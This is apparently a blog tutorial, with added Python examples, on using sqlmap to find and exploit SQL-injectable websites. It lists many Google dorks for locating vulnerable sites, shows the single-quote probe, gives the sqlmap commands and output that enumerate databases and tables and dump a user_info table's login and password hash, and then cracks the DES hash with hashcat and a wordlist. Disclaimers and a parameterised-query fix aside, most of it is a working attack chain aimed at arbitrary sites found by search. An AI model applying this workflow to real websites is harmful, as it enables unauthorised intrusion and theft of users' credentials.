  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: http://www.sqlmap.org]

Be considerate of the user who spent time and effort to put up a website and possibly depends on it to make ends meet. Your actions might impact someone in a way you never wished for. I can't make it any clearer: only test systems you have permission to test.

So here goes:

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any of the other steps. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search for in Google. Just copy and paste any of the lines into Google and it will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list is really long; it took me a long time to collect. If you know SQL, you can add more: put them in the comment section and I will add them here.

Google Dork strings (each line below holds up to three separate dorks, one per column):
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
inurl:galeri_info.php?l= inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string shown above you will get hundreds of search results. How do you know which site is really vulnerable to SQL injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (To be clear: " is a double quotation mark and ' is a single quotation mark.)

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the parameter is almost certainly injectable and worth handing to sqlmap. If the page loads normally or redirects you to a different page, move on to the next site in your Google search results. Note that the absence of an error is not proof that the site is safe: an application that suppresses error output can still be vulnerable to blind (boolean-based or time-based) injection, which sqlmap also detects, but a visible error is the quickest signal to look for by hand.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

[Screenshot: SQL error page returned after appending a single quote to the URL]

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLException java.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near "'''"
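The error strings above are exactly what sqlmap's error-based detection keys on. As an added example (not part of the original post and not sqlmap's own code), here is a small fingerprinting routine in Python that applies the same signatures to a response body and turns the Step 1.b quote test into a check. The pattern list is built from the samples above and is far shorter than sqlmap's; the sample response bodies are constructed for this example.

```python
import re
from typing import List

# Error signatures per DBMS, taken from the sample error pages above.
# Constructed for this example; sqlmap ships a far longer list.
DBMS_ERROR_SIGNATURES = {
    "Microsoft SQL Server": [
        r"Unclosed quotation mark before the character string",
        r"System\.Data\.SqlClient\.SqlException",
    ],
    "MySQL": [
        r"You have an error in your SQL syntax",
        r"supplied argument is not a valid MySQL result resource",
        r"Warning: mysqli?_[a-z_]+\(\)",
    ],
    "Oracle": [
        r"\bORA-\d{5}\b",
        r"java\.sql\.SQLException.*oracle\.jdbc",
    ],
    "PostgreSQL": [
        r"unterminated quoted string at or near",
        r"pg_query\(\): Query failed",
    ],
}


def fingerprint_dbms(body: str) -> List[str]:
    """Return the DBMS names whose error signatures appear in a response body."""
    return [
        dbms
        for dbms, patterns in DBMS_ERROR_SIGNATURES.items()
        if any(re.search(p, body, re.IGNORECASE | re.DOTALL) for p in patterns)
    ]


def quote_probe_positive(baseline_body: str, probed_body: str) -> bool:
    """Step 1.b as a check: the request with a trailing ' leaks a DBMS error
    that the unmodified request did not. A False result does not clear the
    site; blind injection produces no error text at all."""
    return bool(fingerprint_dbms(probed_body)) and not fingerprint_dbms(baseline_body)


# Constructed response bodies modelled on the error samples above.
SAMPLE_BODIES = {
    "baseline": "<html><body><h1>Item 15</h1><p>In stock.</p></body></html>",
    "mssql": ("Server Error in '/' Application. Unclosed quotation mark before "
              "the character string 'attack;'."),
    "mysql": ("Warning: mysql_fetch_array(): supplied argument is not a valid "
              "MySQL result resource in /var/www/myawesomestore.com/buystuff.php "
              "on line 12"),
    "oracle": "java.sql.SQLException: ORA-00933: SQL command not properly ended",
    "postgres": "Query failed: ERROR: unterminated quoted string at or near \"'''\"",
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name:9s} -> {fingerprint_dbms(body) or ['no DBMS error']}")
```

The same signatures are useful on the defending side: a web server or WAF log line that matches one of them after a request containing a quote is a strong indicator that someone is running this exact test against you.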

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I've found a website vulnerable to SQL injection. Now I need to list all the databases on that vulnerable database server (sqlmap calls this enumerating the DBMS databases; it is not the same as working out the number of columns in the injected query, which sqlmap does internally when it sets up a UNION-based injection). As I am using sqlmap, it will also tell me which parameter is injectable and which injection techniques work against it.

Run the following command against your vulnerable website:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = name of the sqlmap binary
-u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15"; quote the URL if it contains characters such as & that the shell would otherwise interpret)
--dbs = enumerate DBMS databases

See screenshot below.

[Screenshot: sqlmap --dbs output]

This command reveals quite a bit of interesting information:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So we now have two databases to look into. information_schema is the standard metadata schema present on every MySQL server from 5.0 onwards, so our interest is in the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables the sqldummywebsite database has and what their names are. To find out, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database has 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

[Screenshot: sqlmap --tables output]

And of course we want to check what's inside the user_info table, as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns of the target table user_info in the sqldummywebsite database. sqlmap makes this really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries (columns) from the target table user_info of the sqldummywebsite database; sqlmap reports each column name followed by its type.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for: the columns user_login and user_password.

[Screenshot: sqlmap --columns output]

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

sqlmap makes this easy! Just run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

[Screenshot: sqlmap --dump output for user_login]

Almost there; we now only need the password for this user. The next step shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You're probably getting used to sqlmap by now. Use the following command to extract the password for the user (you could also have dumped both columns in one run with -C user_login,user_password):

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

[Screenshot: sqlmap --dump output for user_password]
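What the quote test in Step 1.b triggers, and what Steps 2 to 6 automate, can be seen in a few lines of code. The following is an added example and not code from the original post or from sqlmap. It builds an in-memory SQLite database (the post's target ran MySQL, but the concatenation mistake and the UNION trick work the same way) with the user_info table enumerated above and one constructed row that reuses the dumped values, then shows the vulnerable lookup failing on 15', a UNION payload pulling the credentials out through the item endpoint, and a parameterised lookup that does neither. The item table, its one row and the unique_id value are assumptions for the example.

```python
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's database: the item table behind
    item.cgi?item_id= and the user_info table sqlmap enumerated, with one
    row that reuses the dumped values."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE item (item_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE user_info (
            user_id        INTEGER PRIMARY KEY,
            user_login     TEXT,
            user_password  TEXT,
            unique_id      TEXT,
            record_status  INTEGER
        );
        INSERT INTO item VALUES (15, 'Widget');
        INSERT INTO user_info VALUES (1, 'userX', '24iYBc17xK0e.', 'u-0001', 1);
    """)
    return conn


def lookup_item_vulnerable(conn: sqlite3.Connection, item_id: str) -> List[Tuple]:
    """The bug the post hunts for: the raw query-string value is pasted into
    the statement, so anything after the number is executed as SQL."""
    sql = "SELECT title FROM item WHERE item_id = " + item_id
    return conn.execute(sql).fetchall()


def lookup_item_safe(conn: sqlite3.Connection, item_id: str) -> List[Tuple]:
    """Parameterised form: the value is bound separately from the statement
    text, so it can only ever be compared against item_id, never executed."""
    sql = "SELECT title FROM item WHERE item_id = ?"
    return conn.execute(sql, (item_id,)).fetchall()


Lookup = Callable[[sqlite3.Connection, str], List[Tuple]]


def quote_probe_errors(conn: sqlite3.Connection, lookup: Lookup) -> bool:
    """Step 1.b in code: does appending a single quote to a working id turn
    the request into a database error?"""
    try:
        lookup(conn, "15'")
    except sqlite3.OperationalError:   # SQLite reports: unrecognized token: "'"
        return True
    return False


def union_dump(conn: sqlite3.Connection, lookup: Lookup) -> List[Tuple]:
    """What sqlmap's -T user_info -C user_login,user_password --dump does for
    a UNION-injectable parameter. sqlmap first works out how many columns the
    original SELECT returns (one here) so the injected SELECT lines up, then
    appends rows from the table it wants to the page's own result set."""
    payload = "15 UNION ALL SELECT user_login || ':' || user_password FROM user_info"
    return lookup(conn, payload)


if __name__ == "__main__":
    db = make_db()
    print("baseline:", lookup_item_vulnerable(db, "15"))
    print("quote probe (vulnerable):", quote_probe_errors(db, lookup_item_vulnerable))
    print("quote probe (safe):", quote_probe_errors(db, lookup_item_safe))
    print("union dump (vulnerable):", union_dump(db, lookup_item_vulnerable))
    print("union dump (safe):", union_dump(db, lookup_item_safe))
```

Against the safe lookup the probe string and the UNION payload are simply values that match no item_id, so the page returns an empty result with no error and no extra rows; that is the fix for every site this guide finds.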

But hang on, this password looks funny. This can't be someone's password; even someone who leaves their website vulnerable like that wouldn't have a password like this.

That is exactly right. This is a password hash, not the password itself. Hashing is one-way, so there is nothing to decrypt: what we can do is guess candidate passwords, hash each one with the same algorithm and salt, and see which guess produces the same value. That is what cracking means.

I have covered how to crack password hashes extensively in my Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you've missed it, you're missing out a lot.

I will cover it briefly here, but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. (13 characters, including the trailing dot). How do you know what type of hash that is?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a tool for this. On the command line type the following and paste the hash value at the prompt:

hash-identifier

[Screenshot: hash-identifier output]

Excellent. So this is a DES(Unix) hash, i.e. a traditional crypt(3) hash: 13 characters from the alphabet [./0-9A-Za-z], the first two of which (here 24) are the salt. Tools like hash-identifier only guess from the format, so it pays to confirm the length and alphabet yourself; here they agree.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which mode number hashcat uses for DES hashes. So let's check:

cudahashcat --help | grep DES

[Screenshot: cudahashcat --help | grep DES output]

So it's either 1500 or 3100. Mode 3100 is Oracle's own DES-based password hash (Oracle 7+), which has a different format and is only produced by an Oracle database; this value came from a MySQL-backed site and has the crypt(3) format, so the right mode is 1500 (descrypt, DES(Unix), Traditional DES).
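hash-identifier and the grep above both come down to recognising the format of the dumped value and mapping it to a hashcat mode. As an added example (not from the post, hash-identifier or hashcat), here is that logic in Python for the formats a web-application credential dump is most likely to contain. The mode numbers are hashcat's; the hash values in the main block and the format list are constructed for the example. Where the format alone is ambiguous (16 hex digits could be MySQL's OLD_PASSWORD() or Oracle's pre-11g hash; 32 hex digits could be MD5 or NTLM) it returns every candidate and lets the back-end DBMS sqlmap reported break the tie, which is the reasoning applied above to 1500 versus 3100.

```python
import re
from typing import List, Optional, Tuple

# (description, hashcat -m, full-match regex). The mode numbers are hashcat's
# real ones; the set is limited to formats a web-app credential dump commonly
# holds. Oracle's DES hash (3100) is 16 hex digits that hashcat expects as
# hash:username, so a 13-character crypt(3) value can never be mode 3100.
HASH_FORMATS: List[Tuple[str, int, str]] = [
    ("descrypt / DES(Unix) / Traditional DES", 1500, r"[./0-9A-Za-z]{13}"),
    ("md5crypt ($1$)",                          500,  r"\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}"),
    ("sha256crypt ($5$)",                       7400, r"\$5\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{43}"),
    ("sha512crypt ($6$)",                       1800, r"\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{86}"),
    ("bcrypt ($2*$)",                           3200, r"\$2[abxy]?\$\d{2}\$[./0-9A-Za-z]{53}"),
    ("phpass (phpBB3 $H$ / WordPress $P$)",     400,  r"\$[PH]\$[./0-9A-Za-z]{31}"),
    ("MySQL 4.1+ PASSWORD()",                   300,  r"\*[0-9A-F]{40}"),
    ("MySQL323 OLD_PASSWORD()",                 200,  r"[0-9A-F]{16}"),
    ("Oracle H: type (Oracle 7+)",              3100, r"[0-9A-F]{16}"),
    ("MD5",                                     0,    r"[0-9A-F]{32}"),
    ("NTLM",                                    1000, r"[0-9A-F]{32}"),
    ("SHA-1",                                   100,  r"[0-9A-F]{40}"),
]


def identify_hash(value: str) -> List[Tuple[str, int]]:
    """All (description, mode) pairs whose format matches the whole value."""
    value = value.strip()
    return [(desc, mode) for desc, mode, rx in HASH_FORMATS
            if re.fullmatch(rx, value, re.IGNORECASE)]


def pick_mode(value: str, backend: str = "") -> Optional[int]:
    """Choose a single hashcat mode, using the DBMS name sqlmap reported to
    break a tie. None means the format is still ambiguous and the caller has
    to decide (or try each candidate mode in turn)."""
    candidates = identify_hash(value)
    if len(candidates) == 1:
        return candidates[0][1]
    if backend:
        narrowed = [mode for desc, mode in candidates if backend.lower() in desc.lower()]
        if len(narrowed) == 1:
            return narrowed[0]
    return None


def hashcat_command(hash_file: str, wordlist: str, mode: int) -> List[str]:
    """argv for the dictionary attack run in Step 7.b, using the single
    hashcat binary that replaced cudaHashcat/oclHashcat from hashcat 3.0."""
    return ["hashcat", "-m", str(mode), "-a", "0", hash_file, wordlist]


if __name__ == "__main__":
    dumped = "24iYBc17xK0e."            # the value dumped in Step 6
    print(identify_hash(dumped))       # only descrypt (1500) matches
    mode = pick_mode(dumped, backend="MySQL")
    print(" ".join(hashcat_command("DES.hash", "rockyou.txt", mode)))
```

Returning every candidate rather than a single best guess is deliberate: hash-identifier's "possible hashes" list exists for the same reason, and feeding hashcat the wrong mode wastes a GPU run without telling you the guess was wrong.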

I am running a computer that has an NVIDIA graphics card, so I will be using cudaHashcat. On my laptop I have an AMD/ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work, because the virtual machine has no direct access to the GPU. You must install Kali on either a persistent USB stick or a hard disk; instructions are on the website, search around. (Since hashcat 3.0 the CPU, CUDA and OpenCL builds have been merged into a single hashcat binary, so on a current Kali the commands below are run as hashcat instead.)

I saved the hash value 24iYBc17xK0e. in a file named DES.hash. This is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

[Screenshot: cudahashcat cracking the DES hash]

Interesting find: the usual (CPU) hashcat was unable to determine the mode for DES hashes (it is not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the hash.

Anyhow, here's the cracked password: abc123 (hashcat prints it as hash:password, i.e. 24iYBc17xK0e.:abc123).

Sweet, we now even have the password for this user.

Conclusion

Thanks for reading and visiting my website.

There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to.

Please share and let everyone know how to test their websites using this technique.

https://www.hackthissite.org/
